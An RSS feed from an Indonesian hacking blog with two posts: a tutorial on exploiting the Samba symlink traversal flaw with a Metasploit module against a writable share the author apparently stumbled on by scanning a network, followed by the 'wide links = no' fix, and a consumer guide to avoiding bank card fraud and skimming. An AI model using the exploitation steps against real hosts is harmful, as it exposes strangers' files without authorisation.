<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>c@ptUR3PhL49$</title>
	<atom:link href="http://fvck.captureflags.com/feed" rel="self" type="application/rss+xml" />
	<link>http://fvck.captureflags.com</link>
	<description>--= NEO Pow3r -=- N3o l0GIC =--</description>
	<lastBuildDate>Wed, 24 Feb 2010 12:58:16 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.9.2</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>exploitasi samba symbolik link transversal</title>
		<link>http://fvck.captureflags.com/exploitasi-samba-symbolik-link-transversal.x</link>
		<comments>http://fvck.captureflags.com/exploitasi-samba-symbolik-link-transversal.x#comments</comments>
		<pubDate>Wed, 24 Feb 2010 01:00:17 +0000</pubDate>
		<dc:creator>laharisi</dc:creator>
				<category><![CDATA[attacking]]></category>
		<category><![CDATA[defensing]]></category>
		<category><![CDATA[0wn3d]]></category>
		<category><![CDATA[0wned]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[metasploit]]></category>
		<category><![CDATA[samba]]></category>
		<category><![CDATA[smb]]></category>
		<category><![CDATA[tutorial]]></category>

		<guid isPermaLink="false">http://fvck.captureflags.com/?p=384</guid>
		<description><![CDATA[gk sengaja scanning &#8211; scanning jaringan ketemu IP komputer dengan samba  share enable..kalo gk salah OSnya ubuntu..
iseng &#8211; iseng masuk ke folder sharenya.ternyata folder yang di share bisa di write..
 kalo dah gini jadi ingat ama bug samba symbolic link  transversal
bug ini di temukan oleh Kingcope&#8230;menurut gw bugnya tu lucu bangat...lucu tapi benar2 [...]]]></description>
			<content:encoded><![CDATA[<p>gk sengaja scanning &#8211; scanning jaringan ketemu IP komputer dengan samba  share enable..kalo gk salah OSnya ubuntu..<br />
iseng &#8211; iseng masuk ke folder sharenya.ternyata folder yang di share bisa di <strong>write</strong>..<br />
 kalo dah gini jadi ingat ama bug samba symbolic link  transversal<br />
bug ini di temukan oleh Kingcope&#8230;menurut gw bugnya tu lucu bangat..<img src='http://fvck.captureflags.com/smilies/yahoo_tongue.gif' alt='&#58;&#112;' class='wp-smiley' width='18' height='18' title='&#58;&#112;' />.lucu tapi benar2 fatal&#8230;</p>
<p>proof on concept :</p>
<p>jika folder yang di share dengan samba bisa di write &#8216;tanpa konfigurasi security yang laen&#8217; kita bisa membuat sebuah shortcut(symbolic link ) ke root filesystem..misalnya dengan perintah <strong>symlink ../../../../../../ captureflags<br />
</strong>..ketika symbolic link( captureflags ) di akses,maka kita bisa mengakses seluruh file yang ada di computer itu&#8230;simple tapi fatal&#8230;</p>
<p>contoh kali ini menggunakan metasploit..ketebetulan neh exploit uda di include di metasploit ( update 2010.02.15 )..<br />
kalo lom ada tinggal di update aja</p>
<p>scanning target :<br />
<a href="http://fvck.captureflags.com/wp-content/uploads/11.jpg"><img src="http://fvck.captureflags.com/wp-content/uploads/11-300x212.jpg" alt="" title="1" width="300" height="212" class="aligncenter size-medium wp-image-385" /></a><br />
<span id="more-384"></span><br />
dari gambar bisa dilihat samba dari host target aktif..</p>
<p>sekarang sambanya di cek dulu bisa di akses apa gk :<br />
<a href="http://fvck.captureflags.com/wp-content/uploads/21.jpg"><img src="http://fvck.captureflags.com/wp-content/uploads/21-300x212.jpg" alt="" title="2" width="300" height="212" class="aligncenter size-medium wp-image-386" /></a></p>
<p>exploitasi :<br />
buka metasploit..disini menggunakan module auxiliary/admin/smb/smb_symlink_transveral<br />
<a href="http://fvck.captureflags.com/wp-content/uploads/3.jpg"><img src="http://fvck.captureflags.com/wp-content/uploads/3-300x213.jpg" alt="" title="3" width="300" height="213" class="aligncenter size-medium wp-image-387" /></a><br />
dari hasil exploitasi di atas,symbolic link dengan nama <strong>laharisi</strong> uda di buat.</p>
<p>apa yang terjadi ketika symbolic link laharisi di akses..?? let&#8217;s check it out :<br />
<a href="http://fvck.captureflags.com/wp-content/uploads/4.jpg"><img src="http://fvck.captureflags.com/wp-content/uploads/4-300x211.jpg" alt="" title="4" width="300" height="211" class="aligncenter size-medium wp-image-388" /></a><br />
bisa dilihat seluruh isi file system bisa di akses.<br />
hal ini menyebabkan data &#8211; data sensitif dari target bisa di akses ataupun dicuri ataupun disalah gunakan</p>
<p>prefentif :<br />
jika membuat sebuah file server dengan samba yang memungkinkan anonymouse user melakukan <strong>write</strong> tambahkan konfigurasi <strong>wide links = no</strong> pada global konfigurasi samba atau yang di spesifik konfigurasi untuk masing &#8211; masing folder sharing.konfigurasi ini akan mencegah terjadinya pembuatan symbolic link / shortcut ke beberapa folder atau ke root file system..</p>
<p>&#8212; semoga bermanfaat and hope you enjoy&#8230;!! &#8212;</p>
<a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Ffvck.captureflags.com%2Fexploitasi-samba-symbolik-link-transversal.x&amp;linkname=exploitasi%20samba%20symbolik%20link%20transversal">Share/Save</a>]]></content:encoded>
			<wfw:commentRss>http://fvck.captureflags.com/exploitasi-samba-symbolik-link-transversal.x/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>7 KIAT MENGHINDARI PEMBOBOLAN REKENING</title>
		<link>http://fvck.captureflags.com/7-kiat-menghindari-pembobolan-rekening.x</link>
		<comments>http://fvck.captureflags.com/7-kiat-menghindari-pembobolan-rekening.x#comments</comments>
		<pubDate>Sat, 13 Feb 2010 20:37:37 +0000</pubDate>
		<dc:creator>Xshadow</dc:creator>
				<category><![CDATA[mem-BACOT]]></category>

		<guid isPermaLink="false">http://fvck.captureflags.com/7-kiat-menghindari-pembobolan-rekening.x</guid>
		<description><![CDATA[(Himbauan Kepada Masyarakat dan Keterangan Pers)
Maraknya kejadian pembobolan rekening melalui eksploitasi kelemahan  sistem layanan ATM dan juga SMS serta Internet banking meninjukkan  semakin canggihnya para penjahat cyber. Pihak perbankan harus memiliki  sistem pengamanan yang kuat dan terus ditingkatkan kemampuannya dari  waktu ke waktu untuk antisipasi berbagai jenis upaya kejahatan yang  [...]]]></description>
			<content:encoded><![CDATA[<p>(Himbauan Kepada Masyarakat dan Keterangan Pers)</p>
<p>Maraknya kejadian pembobolan rekening melalui eksploitasi kelemahan  sistem layanan ATM dan juga SMS serta Internet banking meninjukkan  semakin canggihnya para penjahat cyber. Pihak perbankan harus memiliki  sistem pengamanan yang kuat dan terus ditingkatkan kemampuannya dari  waktu ke waktu untuk antisipasi berbagai jenis upaya kejahatan yang  terus berubah dan berkembang.</p>
<p>Meskipun demikian, agar terhindar dari tindak kriminal, diperlukan juga  peran aktif nasabah. Karena  di dalam dunia keamanan dikenal istilah  “your security is my security”. <span id="more-382"></span>Semua pihak harus melakukan peningkatan  pengetahuan dan pemahaman bahwa di dalam pemanfaatan berbagai macam  layanan yang berbasis teknologi, selain memudahkan juga terdapat resiko  yang harus diwaspadai.</p>
<p>Berikut ini adalah 7 kiat untuk menghindari aksi pembobolan rekening  ini:</p>
<p>1. Tak Kenal Maka Tak Sayang</p>
<p>Kenali layanan yang digunakan dan cermati bagaimana cara kerja  teknologinya serta pahami aturan serta prosedur yang diterapkan terutama  di dalam aspek pengamanan. Bank memiliki banyak produk dan layanan,  sudah sepatutnya nasabah memahami dan dapat membedakan karakteristiknya.  Contoh layanan SMS/mobile banking dan Internet banking pada prinsipnya  adalah perluasan dari layanan ATM namun dengan fitur yang lebih terbatas  dibandingkan ATM. Artinya, tidak semua fitur yang tersedia di ATM  (misalnya ganti PIN) bisa digunakan pula di SMS/mobile banking atau  Internet banking.</p>
<p>Nasabah juga perlu mengetahui, bahwa untuk dapat menggunakan SMS/mobile  banking dan Internet banking, terlebih dahulu harus memiliki kartu ATM  dan PIN yang nanti akan digunakan untuk aktivasi/ mendaftar. Bila  nasabah telah paham kondisi ini, maka ybs. dapat memilih untuk  menggunakan atau tidak menggunakan layanan tersebut sesuai kebutuhannya.  Sebab tidak semua orang memanfaatkan online banking bahkan kartu ATM  pun belum tentu digunakan. Sementara sebagian bank, terutama yang sudah  online seolah menerapkan keharusan setiap nasabah untuk memiliki kartu  ATM.</p>
<p>Setelah memahami karakteristik layanan, maka selanjutnya nasabah juga  perlu mengetahui cara kerja teknologi yang bekerja di balik layanan  tersebut. Edukasi semacam ini seharusnya menjadi tanggung jawab bank dan  atau pihak penyedia teknologi seperti misalnya operator selular dan  provider Internet. Yang paling penting di dalam edukasi ini adalah untuk  menanamkan pemahaman dan disiplin kepada nasabah prosedur pemanfaatan  layanan dan teknologi yang benar, mengenali kelemahannya dan juga  sekaligus tata cara pengamanannya. Dengan memahami resiko, nasabah akan  lebih waspada.</p>
<p>Yang paling penting bagi nasabah adalah, tidak ada keharusan untuk  memanfaatkan semua layanan, fitur dan teknologi yang ditawarkan.  Sesuaikan dengan kebutuhan anda, manakah yang paling mudah (dikuasai)  dan paling nyaman untuk digunakan di dalam menunjang aktivitas  transaksi.</p>
<p>*) catatan: anda punya pilihan untuk memilih bank dan jenis produk  layanannya yang paling sesuai dengan kebutuhan. Semua bank masih tetap  memiliki layanan teller konvensional dan punya cabang hingga ke pelosok,  terutama beberapa bank nasional maupun bank daerah milik pemerintah.</p>
<p>2. Mengetahui Jenis Kartu Transaksi</p>
<p>Khusus untuk layanan yang menggunakan kartu sebagai media, ATM, debit,  voucher elektronik, kartu kredit, dlsb. perlu diketahui jenis kartu yang  dipakai. Pada prinsipnya saat ini ada 2 jenis kartu yaitu:</p>
<p>Magnetic stripe card, mengikuti standar ISO/IEC untuk ukuran, bentuk,  karakteristik bahan magnetik yang digunakan,penempatan jalur pita  magnetik, hingga format penyimpanan data. Prinsipnya kartu jenis ini  menyimpan data di dalam pita magnetik yang kemudian dapat dibaca ulang  menggunakan alat yang memiliki head pembaca seperti di dalam perangkat  tape recorder, dengan cara digesekkan. Masyarakat awam menyebut jenis  kartu ini dengan istilah “kartu gesek” atau “swipe card”.</p>
<p>Cara kerja teknologi magnetic stripe card pada dasarnya adalah seperti  ini: pada saat digesek itulah isi data pita magnetik dibaca, dikirim,  diterjemahkan dan diolah pemroses di sisi pusat untuk memeriksa  identitas pemegang kartu, validitas dari kartu itu sendiri dan juga  keabsahan transaksinya. Proses ini terjadi secara real time dan harus  online apabila unit pembaca dan pemrosesnya terpisah.</p>
<p>Kartu magnetik digunakan luas oleh masyarakat untuk berbagai macam  keperluan, mulai dari kartu identitas karyawan/mahasiswa/pelajar</p>
<div>, SIM hingga kartu akses kamar hotel dlsb.  bukan hanya untuk kartu ATM/debit atau kartu kredit. Sehingga perangkat  pembaca (reader/skimmer), maupun untuk menulis (recorder) serta aneka  software untuk enkripsi/dekripsi data dijual bebas di pasaran. Bukan hal  yang luar biasa apabila terjadi penggandaan kartu ATM karena  perangkatnya tersedia dan tidak memerlukan keterampilan yang khusus  untuk melakukannya. Apalagi teknologi ini sudah digunakan selama sekitar  20 tahun sehingga berbagai macam kelemahan telah diketahui luas dan  karenanya sudah sepatutnya mulai digantikan dengan teknologi lainnya  yang lebih maju dan aman.</p>
<p>Kartu dengan teknologi baru adalah jenis chip/smart card. Bentuknya  seperti yang digunakan pada telepon selular (GSM/CDMA SIM/RUIM card).  Ukuran dan formatnya diatur oleh standar internasional (ISO). Chip  tersebut bisa berfungsi sebagai memori saja maupun juga sebagai  mikroprocessor atau sekaligus keduanya. Pada dasarnya adalah sistem  komputer dalam satu chip yang ditanamkan pada kartu plastik. Cara  kerjanya dapat melalui kontak langsung dengan cara ditancapkan maupun  secara nirkabel, cukup ditempelkan dari jarak dekat pada mesin pembaca  atau kombinasi keduanya (hybrid) dan dapat digabungkan dengan teknologi  lainnya seperti RFID maupun biometric system.</p>
<p>Biasanya chip card ini juga masih dipasang magnetic stripe untuk  kebutuhan backward compatibility (kompatibilitas mundur), terutama untuk  aplikasi di sektor perbankan. Karena belum semua jaringan layanan  perbankan seperti mesin ATM, EDC telah memiliki kemampuan pembacaan dan  pengolahan smart card. Sehingga magnetic stripe tetap dipasang di kartu  yang sama sebagai backup.</p>
<p>Kelebihan smart card terutama adalah kemampuan pengolahan transaksi  secara offline. Artinya tidak harus terkoneksi real time ke server atau  pengolah pusat. Ini dimungkinkan karena seluruh data pada dasarnya telah  ditanamkan di dalam chip, bukan hanya identitas tetapi juga termasuk  besarnya saldo atau dana yang tersedia. Bahkan dimungkinkan melakukan  transaksi langsung dari user ke user tanpa melalui bank. Sehingga kartu  jenis ini dapat digunakan untuk beberapa fungsi sekaligus misalnya saja  sebagai kartu ATM/debit dan juga sebagai kartu kredit dan voucher  sekaligus, jadi praktis.</p>
<p>Smart card juga relatif lebih aman dibanding pendahulunya. Karena  memiliki kemampuan processing sendiri selain sebagai memori, maka  relatif lebih sulit digandakan dibandingkan jenis kartu magnetic stripe  yang bersifat hanya sebagai memori saja. Perlu peralatan khusus untuk  mencetak smart card yang harganya jauh lebih mahal dan oleh vendor hanya  disediakan dalam jumlah terbatas.</p>
<p>Maka demi keamanan, gunakan hanya kartu chip. Kalau bank belum  memberikan kartu chip, Anda harus minta ganti dan jangan menggunakan  untuk transaksi sebelum diganti. Aturan Bank Indonesia (BI), sejak  Januari 2010 untuk kartu kredit yang boleh digunakan hanya kartu jenis  chip.</p>
<p>*) catatan: eksploitasi celah kelemahan smart card juga sudah banyak  terjadi dan ada banyak kasus dilaporkan. Misalnya penggandaan chip dan  pemindai jarak jauh untuk smart card berbasis teknologi RFID (kartu  voucher yang ditempelkan pada mesin EDC). Sehingga beberapa layanan  mulai membuat kombinasi sistem keamanan ganda tidak hanya berbasis PIN  dan password melainkan juga biometrik (sidik jari, retina dlsb.). Tapi  masalahnya adalah biaya dan kerumitan implementasinya.</p>
<p>3. Perlindungan Kartu Secara Fisik</p>
<p>Kalau kartu anda dapat digunakan pada jaringan internasional, maka  biasanya akan memiliki kode 3 angka (CVV2) di belakang kartu Anda.  Kecuali untuk otorisasi transaksi online, kode CVV2 tidak akan pernah  digunakan. Tutup 3 angka di belakang kartu dengan sticker, cellotape  yang tidak transparan. Untuk transaksi konvensional di mesin ATM,  counter EDC merchant kode CVV2 juga tidak diperlukan. Apabila kartu  rusak, terlipat, patah ataupun hilang, segera lakukan pemblokiran dan  minta pengganti. Catat nomor telepon hotline, customer service, fax dan  alamat resmi bank penerbit kartu. Gandakan catatan ini pada beberapa  tempat yang berbeda namun mudah diakses pada saat genting.</p>
<p>Untuk melindungi kartu jenis RFID (misalnya voucher pra bayar  elektronik), saat ini di pasaran banyak dijual casing (seperti  jaket/sleeve) anti pemindai. Di kalangan underground banyak dijual  peralatan ini (pemindai RFID) dengan harga murah dan bahkan cukup mudah  dibuat sendiri (homebrew).</p>
<p>4. Manajemen PIN dan Password</p>
<p>Langkah pengamanan sendiri (self protection) yang perlu dilakukan adalah  mengganti PIN ATM, kartu debit/kredit, SMS/mobile banking dan password  Internet banking anda sesering mungkin. Parameter sederhana untuk  penggantian PIN dan password adalah misalnya ketika anda cukur rambut  atau ganti kaos kaki (yang mulai bau), atau ganti sikat gigi (karena  sudah mulai kusut) atau tiap kali cek tekanan roda kendaraan, itulah  saatnya mengganti PIN. Di stasiun pompa bensin biasanya ada mesin ATM  dan anda bisa mengganti PIN ketika sedang melakukan transaksi pembelian  BBM.</p>
<p>Selain itu simpanlah PIN di tempat aman dan sandikan catatan itu dengan  cara anda sendiri (misalnya dengan menyisipkan angka tambahan), sehingga  orang lain tidak mudah menebak PIN anda. Sedang untuk password,  sebaiknya gunakan kombinasi alfanumerik dan karakter spesial apabila  diijinkan oleh sistem. Gunakan frasa panjang (lebih dari 8 karakter)  yang tidak mudah dimengerti maknanya secara harfiah. Yang terakhir,  jangan pernah memberitahukan PIN dan password kepada siapapun termasuk  kepada petugas bank dengan alasan apapun. Karena itu pintu masuk  segalanya.</p>
<p>Musuh utama masalah keamanan adalah perilaku (behaviour) manusia itu  sendiri, kebiasaan buruk yang diabaikan (permisif). Sebagian besar  insiden terjadi akibat eksploitasi kelemahan secara sosial, sehingga  tekniknya disebut dengan social engineering (rekayasa sosial). Modus  penipuan mengaku undian berhadiah atau petugas bank yang sedang  melakukan perawatan atau orang yang mengaku petugas bank dan memberikan  bantuan adalah contoh rekayasa sosial tersebut.</p>
<p>*) catatan: manusia punya kelemahan dalam mengingat sejumlah besar PIN  dan password, apalagi harus diganti secara periodik. Anda dapat  menggunakan software komputer yang disebut password manager untuk  mengelola aneka PIN dan password serta perubahannya tanpa harus  menghapalkan satu per satu. Software tersebut yang akan melakukan  perubahan periodik terhadap password anda bahkan tanpa anda sendiri  mengetahui/hapal isi passwordnya. Sehingga teknik social engineering tak  akan mudah memperdaya anda. Anda cukup menghapal satu kata kunci  pembuka sandi software itu saja. Data hasil penyimpanan disandikan,  sehingga walaupun bisa diambil orang lain, tetap saja tidak bisa dibaca  secara telanjang. Dengan software ini anda dapat menyimpan dan  mengamankan data di tempat yang terpisah untuk memudahkan anda  mengaksesnya dan untuk menghindari single point of failure. Misalnya,  bila anda hanya menyimpan data PIN dan password di HP atau notebook,  maka ada kemungkinan masalah bila justru media itu yang hilang. Dengan  software ini anda dapat menyimpan data di sejumlah tempat dan bisa  diakses dari manapun, di Internet misalnya.</p>
<p>5. Tidak Mudah Percaya dan Lakukan Cross Check</p>
<p>Jangan pernah memberikan informasi PIN, password dan data pribadi yang  biasa digunakan untuk otorisasi perbankan kepada siapapun dengan alasan  apapun termasuk pada customer service bank. Data pribadi seperti  misalnya nama gadis ibu kandung dan lainnya, walaupun bukan informasi  yang rahasia, namun oleh bank selalu dijadikan kata kunci otentikasi  identitas nasabah. Oleh karena itu, sebaiknya informasi tersebut  diindungi, tidak mudah diberikan kepada siapapun. Kecuali memang yakin  bahwa itu prosedur yang harus dilalui, misalnya ketika melaporkan  kehilangan kartu.</p>
<p>Oleh karena itu sangat penting bagi nasabah untuk memahami detail setiap  aspek layanan sehingga bisa membedakan manakah prosedur sesungguhnya  dan yang ternyata adalah jebakan.</p>
<p>Sekarang banyak sekali pihak ketiga (misalnya perusahaan asuransi)  dengan alasan ada kerja sama dengan pihak bank penerbit kartu,  menawarkan produknya secara telemarketing dan anda diminta memberikan  informasi pribadi tertentu dengan alasan untuk keperluan otentikasi.  Resikonya, apabila ternyata bukan telemarketing tetapi dari sindikat  pelaku fraud yang mencoba mengkorek data dan informasi pribadi, anda  tidak pernah tahu dan seolah diposisikan tidak bisa melakukan cross  check dalam situasi ini. Lebih bijaksana bersikap tidak mudah percaya  dan tetap cross check.</p>
<p>Berhati-hati apabila menerima tawaran dari telemarketing, karena  biasanya persetujuan yang anda berikan akan diterjemahkan sebagai  kesediaan untuk melakukan auto debet terhadap account anda. Ini  berbahaya, lebih baik bila kurang yakin, anda meminta waktu untuk  melakukan konfirmasi kepada bank penerbit apakah benar pihak bank punya  kerjasama dengan pihak telemarketing tersebut dan bagaimana aturan main  serta risikonya. Atau tolak tawaran (telemarketing) itu. Kalau anda  tertarik, cukup anda tanyakan kepada petugs telemarketing tsb. nama  produk dan siapa penyelenggaranya. Selanjutnya anda sendiri bisa  inisiatif yang menghubungi penyelenggara jasa itu dan meminta untuk  dilayani. Cara ini lebih aman, lakukan cross check, walau ini perlu  partisipasi aktif anda.</p>
<p>Banyak modus kejahatan melakukan eksploitasi psikologis (bagian dari  social engineering), seperti di dalam tawaran telemarketing atau undian  berhadiah. Manusiawi apabila untuk sesaat seseorang akan merasakan  euforia ketika diberikan ucapan selamat karena mendapatkan hadiah besar.  Tetapi harus tetap waspada dan selalu melakukan cross check walaupun  biasanya pelaku akan menekan dengan cara memberikan ancaman halus berupa  batas waktu. Sesungguhnya anda tetap punya waktu untuk melakukan cross  check. Demikian juga dengan modus penipuan lain, seperti misalnya berita  darurat (sanak keluarga memerlukan tindakan medis segera) ataupun  perintah misterius dari seseorang yang mengaku sebagai petugas/aparat  keamanan. Informasi pribadi milik anda bisa saja digunakan untuk  memperdaya orang terdekat anda atau sebaliknya. Siapapun akan mengalami  kepanikan apabila ada kabar orang terdekat dalam kondisi kritis, apalagi  si pemberi kabar mampu meyakinkan memberikan data-data pribadi yang  sangat akurat, sehingga lalai untuk melakukan cross check.</p>
<p>Hal lain yang perlu anda pahami adalah, tidak selalu informasi pribadi  itu akan digunakan untuk suatu tujuan jahat seperti penipuan dengan  berbagai macam modus yang telah dipaparkan di atas. Di dalam dunia  underground economy (pasar gelap di Internet), informasi pribadi  seseorang adalah komoditas yang sangat diminati dan dapat  diperjualbelikan. Motif yang pertama adalah untuk data marketing. Di  dunia nyata, biaya survey market sangatlah mahal dan seringkali harus  memberikan kompensasi pada responden. Maka, data informasi profile  responden sangatlah berharga. Bila ada yang menjual dengan harga murah,  itu bisa menjadi suatu penghematan besar. Motif yang kedua adalah  sebagai media bagi jenis kejahatan yang lain, seperti misalnya spammer –  perusahaan marketing online yang selalu haus alamat email baru untuk  disebarkan unsolicited mail, brosur dan aneka penawaran sampah. Ataupun  digunakan para bot master untuk menyebarkan malware, menginfeksi  komputer anda dengan trojan dan menggunakannya sebagai pasukan (bersama  ratusan, ribuan komputer lain yang terinfeksi) bots untuk menyerang  pihak lain. Di dunia cyber crime, seorang bot master (attacker) bisa  disewa untuk melakukan serangan terhadap pihak lain. Dan mereka  memanfaatkan komputer anda tanpa disadari. Motif yang ketiga, informasi  rahasia anda digunakan untuk tujuan pemalsuan identitas.</p>
<p>Kesimpulannya, jangan mudah percaya dengan permintaan data pribadi. Baik  itu melalui permintaan off line, via telepon/telemarketing maupun  ketika anda sedang online di Internet. Selalu lakukan cross check dan  apabila anda ragu, lebih baik tinggalkan. Keamanan informasi pribadi  anda lebih penting dan berharga apabila dibandingkan aneka tawaran yang  mungkin diberikan kepada anda.</p>
<p>*) catatan: bank menerapkan suatu teknik pengamanan yang disebut dengan  psuedo security, yaitu serangkaian prosedur yang seolah merupakan  pengamanan padahal sebenarnya bukan. Prosedur itu diadakan untuk  menciptakan rasa aman semu bagi awam, baik itu nasabah maupun manajemen  bank itu sendiri. Misalnya, informasi pribadi yang seolah adalah rahasia  dan karenanya dijadikan basis data untuk otorisasi seperti nama gadis  ibu kandung. Pada prinsipnya nama gadis ibu kandung bukanlah informasi  yang rahasia, karena tentu saja banyak orang yang telah mengetahuinya.  Sehingga kalau ada yang berniat jahat, bisa saja mengumpulkan informasi  tersebut dan merangkainya sedemikian rupa untuk digunakan mengelabui  customer service bank (misalnya via phone banking). Kelemahan psuedo  security inilah yang dimanfaatkan oleh para pelaku kejahatan fraud,  misalnya dengan kedok undian berhadiah atau mengaku sebagai customer  service bank, mitra asuransi dlsb. Istilah lain yang mirip dan sangat  dikenal di dalam dunia kemanan informasi adalah prinsip security through  obscurity. Alasan bank menerapkan pengamanan semu adalah justru demi  untuk kenyamanan nasabah, sebab bila sistem pengamanan yang sesungguhnya  diterapkan maka akan menyulitkan. Bila pengamanan makin ketat maka  tingkat kenyamanan dan kemudahan layanan akan semakin menurun.</p>
<p>6. Berhati-hati Saat Bertransaksi</p>
<p>Modus kejahatan skimming sebenarnya tidak hanya dilakukan di mesin ATM,  namun juga terjadi pada transaksi di mesin EDC counter merchant. Bahkan  modus ini relatif lebih mudah dilakukan pelaku bila dibandingkan dengan  ATM skimmer karena tidak diperlukan kamera pengintip. Beberapa kasus  sudah pernah terbongkar sebelumnya. Pilih merchant yang anda yakini  benar reputasinya.</p>
<p>Awasi terus keberadaan kartu anda ketika berada di counter merchant,  jangan biarkan kartu dibawa kemana-mana dan digesek ke mesin EDC yang  berbeda berkali-kali. Lebih baik anda membatalkan transaksi, tidak usah  menandatangani apapun dan laporkan ke bank penerbit apabila curiga  dengan kondisi di suatu counter merchant. Kalau memungkinkan periksa  kondisi mesin EDC, apakah nampak ada perangkat tambahan atau sambungan  kabel tambahan yang mencurigakan. Tapi ini perlu sedikit pemahaman  teknis, pengguna awam tentu akan sulit membedakan. Namun aksi anda yang  seolah tahu kondisi mesin EDC itu mungkin bisa mencegah pelaku dan  mengurungkan niatnya.</p>
<p>Patut untuk diingat, begitu kartu digesekkan ke mesin EDC, maka semua  informasi penting di dalam magnetic stripe akan tercatat oleh mesin EDC  dan sebagian bahkan akan di print out. Seperti nama, nomor kartu dan  tanggal masa berlaku (kadang kala tanggal mulai menggunakan). Seseorang  tidak perlu punya ingatan super untuk menghapal deretan kode angka yang  tertera di kartu. Kalau anda lengah cukup banyak waktu bisa digunakan  pelaku untuk mencatat informasi itu atau dengan teknik sederhana  menggosok deretan angka yang menonjol (embossed) pada kartu dengan  kepingan uang logam pada kertas karbon nota pembelanjaan yang selalu  tersedia di meja kasir (thrasing). Bahkan mereka bisa saling kerja sama  misalnya berdua, satu orang sengaja mengalihkan perhatian anda dan  satunya yang membawa kartu mencatat atau bahkan menggesekkan kartu anda  ke mesin skimming yang tidak terlihat. Maka sebaiknya anda berusaha  terus mengawasi transaksi tersebut.</p>
<p>Selalu berhati-hati dan harus melakukan pemeriksaan berulang terhadap  transaksi dan mencari tahu terlebih dahulu kredibilitas merchant, ketika  anda memutuskan untuk melakukan transaksi online di Internet.  Perhatikan pula produk yang dijual, apakah benar memiliki kualitas  seperti yang dijanjikan ataukah hanya tipuan? Sebaiknya hanya lakukan  transaksi di situs yang sudah terkenal dan diketahui reputasinya. Selain  lebih meyakinkan, kualitas barang yang ditawarkan pun sesuai.</p>
<p>Banyak sekali situs transaksi online yang tidak kredibel, untuk menjebak  konsumen dan mendapatkan informasi kartu kreditnya. Situs transaksi  online yang kredibel biasanya memiliki referensi dari pihak ketiga, ada  jaminan transaksi pada pelanggan (seperti asuransi, sistem tracking  pengiriman barang, garansi). Periksa semua referensi, apakah benar ada  atau ternyata hanya tipuan. Lakukan pencarian dengan search engine  apakah ditemukan keluhan mengenai situs transaksi tersebut.</p>
<p>Selalu gunakan kartu kredit atau kartu debit yang paling rendah limitnya  ketika melakukan transaksi online, untuk antisipasi seandainya terjadi  fraud. Atau yang lebih bijaksana, gunakan layanan online payment  (e-money) pihak ketiga seperti paypal untuk menghindari transaksi  langsung menggunakan kartu kredit. Anda dapat mengisikan dana dari kartu  kredit ke layanan uang elektronik dalam jumlah yang terbatas sehingga  aman dari upaya pembobolan. Selanjutnya untuk transaksi dengan merchant  online dilakukan dengan pembayaran melalui e-money ini. Merchant yang  bisa menerima pembayaran dengan e-money punya kredibilitas yang  meyakinkan karena dipercaya provider e-money.</p>
<p>Namun bila tetap tidak yakin dengan keamanan kartu kredit dan informasi  pribadi anda, sebenarnya masih ada alternatif lain untuk transaksi  online, yaitu dengan menggunakan metode pembayaran wire transfer. Cara  ini lebih meyakinkan walaupun lebih lama prosesnya dan anda harus  menyediakan uang tunai serta tidak bisa menikmati manfaat pembayaran  tunda serta fasilitas cicilan tetap yang banyak ditawarkan oleh kartu  kredit. Wire transfer juga bisa digunakan untuk mengisi e-money.</p>
<p>*) catatan: perlu diketahui, tidak semua mesin EDC di counter merchant  berasal dari bank, atau tidak dalam pengendalian dan pengawasan bank  sepenuhnya. Mesin EDC itu mungkin saja disediakan oleh pihak ketiga  (vendor outsourcing, perusahaan payment gateway dlsb. Bahkan seperti  mesin ATM ada pula yang menyewakan). Akibatnya sangat mungkin terjadi  penyimpangan mesin EDC.</p>
<p>7. Sadar Lingkungan Transaksi</p>
<p>Ketika anda akan bertransaksi di mesin ATM, hal pertama yang harus anda  lakukan adalah mencari mesin ATM yang sekiranya aman. Pilihlah mesin ATM  yang berada di tempat terbuka dan selalu ramai dikunjungi dan selalu  diawasi keamanannya, misalnya di pusat perbelanjaan. Hindari mesin ATM  yang berada di lokasi yang terpencil, gelap, sepi dan tanpa penjagaan  atau pengawasan.</p>
<p>Kalau anda sedang terburu-buru, tidak sempat memeriksa kondisi mesin ATM  maka langkah paling aman adalah menggunakan outlet yang ada di bank itu  sendiri. Setiap kantor cabang, biasanya kini telah menyediakan mesin  ATM yang relatif terjaga kondisinya karena ada petugas keamanan 24 jam  (walaupun perlu dipahami bahwa tugas petugas keamanan sebenarnya bukan  mengamankan mesin ATM, melainkan menjaga kantor cabang – mesin ATM  termasuk properti kantor tsb.).</p>
<p>Periksalah kondisi mesin ATM. Perhatikan mulut lubang card reader,  apakah ada bekas lem, tempelan atau benda lain yang mencurigakan (karena  tidak seharusnya berada di situ). Untuk memastikannya, goyangkan  sedikit apabila ada benda asing di sekitar mesin ATM (misalnya kotak  pengumuman yang ada di samping mesin ATM), celah di sekitar mesin atau  di atap, untuk memeriksa apakah tidak ada peralatan tersembunyi di  dalamnya, misalnya kamera. Pastikan mulut lubang card reader ATM telah  dilindungi dengan tutup anti skimmer. Cermati apa papan tombol numerik  (keyboard) telah dilindungi dengan penutup. Bila tidak yakin, ketika  memasukkan PIN, lindungi dan tutupi tangan anda sehingga sulit diintip.  Periksa pula apa tidak ada benda lain yang menutupi keyboard, karena  pelaku skimmer bisa saja memasang bantalan tambahan yang menyerupai  keyboard dan berfungsi sebagai keylogger (perekam keyboard). Bila anda  tidak yakin dengan prosedur ini, setiap saat anda bisa meninggalkan  mesin ATM tersebut dan mencari lokasi lain yang lebih terjamin  keamanannya.</p>
